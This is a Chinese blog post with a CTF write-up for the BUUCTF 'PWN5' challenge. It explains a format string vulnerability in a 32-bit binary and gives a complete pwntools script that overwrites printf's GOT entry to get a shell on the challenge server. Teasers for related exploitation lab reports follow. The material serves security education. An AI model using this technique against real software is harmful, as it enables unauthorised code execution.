BUUCTF 第五空间PWN5

发表于2023-10-23|更新于2024-12-14|CTF练习

|总字数:298|阅读时长:1分钟|浏览量:

考点

格式化字符串漏洞

解题过程

首先使用checksec工具查看基本信息

为32位，canary，dep防护

使用ida工具进行静态分析。

main

main函数主要代码如上图所示，可以看见print((int)v7)存在格式化字符串输出漏洞，因此可以考虑进行利用（注：由于输入read限制了输入长度，导致无法通过泄漏canary方法来进行栈溢出攻击。）

构造python脚本如下，主要思路为修改printf的got表plt地址为要执行的代码地址（若开启full relro则无法使用），然后再代码执行到下一次调用printf函数时会转去执行目标代码。获得shell。

from pwn import *

context(arch="i386", log_level="debug")
# p = process("./pwn")
p = remote("node4.buuoj.cn", 29338)

elf = ELF("./pwn")
printf_got = elf.got["printf"]
info(printf_got)
vuln_1 = str(0x0804)
vuln_2 = str(0x931A-0x0804)

payload = flat(b'%', vuln_1, b'c',b'%17$hn', b'%', vuln_2, b'c', b'%18$hn')
payload = payload.ljust(28, b'\x00')
payload = flat(payload, printf_got+2, printf_got)
# gdb.attach(p, 'b *0x080492BC')
p.sendlineafter(b'your name:', payload)
p.recvuntil(b"Hello,")

p.interactive()

结果

文章作者: Eutopia

文章链接: https://eknight-eutopia.github.io/posts/e2482cb8.html

版权声明: 本博客所有文章除特别声明外，均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Small Utopia！

教程 CTF PWN 格式化字符串漏洞

相关推荐

get_started_3dsctf_2016 WriteUp

考点对栈溢出函数带参数的溢出理解解题内容使用checksec工具查看基本信息： 1234567❯ ~/.local/bin/checksec ./get_started_3dsctf_2016[*] '/home/bronya/Documents/ctf/pwn/get_started_3dsctf_2016/get_started_3dsctf_2016' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE...

【SEED Lab2.0】Return_to_Libc实验报告

Task1：Finding out the Addresses of libc Functions 获取system函数和exit函数地址 gdb批处理命令，新建文件peda-session-retlib.txt，进行批处理操作 Task2：Putting the shell string in the memory 编写getprt.c来获取环境变量地址 getprt.c： 12345678#include<stdlib.h>#include<stdio.h>void main(){char* shell = getenv("MYSHELL");if (shell) printf("%x\n", (unsigned int)shell);} 设置/bin/sh的环境变量，获得地址：将代码加入到retlib.c中，获取到地址，可以发现地址与getprt的地址相同。（如果开启aslr或者两文件名长度不同则会不同） Task 3: Launching the...

【SeedLab】格式化字符串实验报告

1 Overviewprintf函数用于根据指定格式打印出字符串，第一个参数诶格式化字符串format string，格式化字符串中使用了%来作为占位符。如果不使用%占位符而是直接将变量放入格式化字符串，则存在格式化字符串漏洞，可能被恶意利用。 2 Environment Setup2.1 Turning of Countermeasure关闭ASLR 12❯ sudo sysctl -w kernel.randomize_va_space=0kernel.randomize_va_space = 0 2.2 The Vulnerable Program漏洞程序如下 format.c：myprintf存在漏洞printf(msg); 1234567891011121314151617181920212223242526void myprintf(char *msg){#if __x86_64__ unsigned long int *framep; // Save the rbp value into framep asm("movq...

鼠标右键添加新建md文档

直接上链接：鼠标右键添加新建.md文档（亲测有效） Windows下右键新建.md文件教程（转）_右键新建md文件_MercyDean的博客-CSDN博客](https://blog.csdn.net/qq_43564374/article/details/109471694))

AI绘图工具以及使用教程

结果展示先放一下结果吧，本人机器只有GTX1650，所以生成的图片质量以及分辨率十分有限~ 大概就是这样，模型可以在civatai（需魔法）和[Hugging Face](Hugging Face – The AI community building the future.)中找。 stable-diffusion-webui工具安装[stable-diffusion官网](AUTOMATIC1111/stable-diffusion-webui: Stable Diffusion web UI...

某二次元游戏私服搭建总结

简述经过大概几个小时的配置环境并debug，终于把Genshin Impact和星穹铁道的私服配置好了。中间也学到了很多东西，以下对整个过程做一个总结。需要的环境Genshin...

评论

数据加载中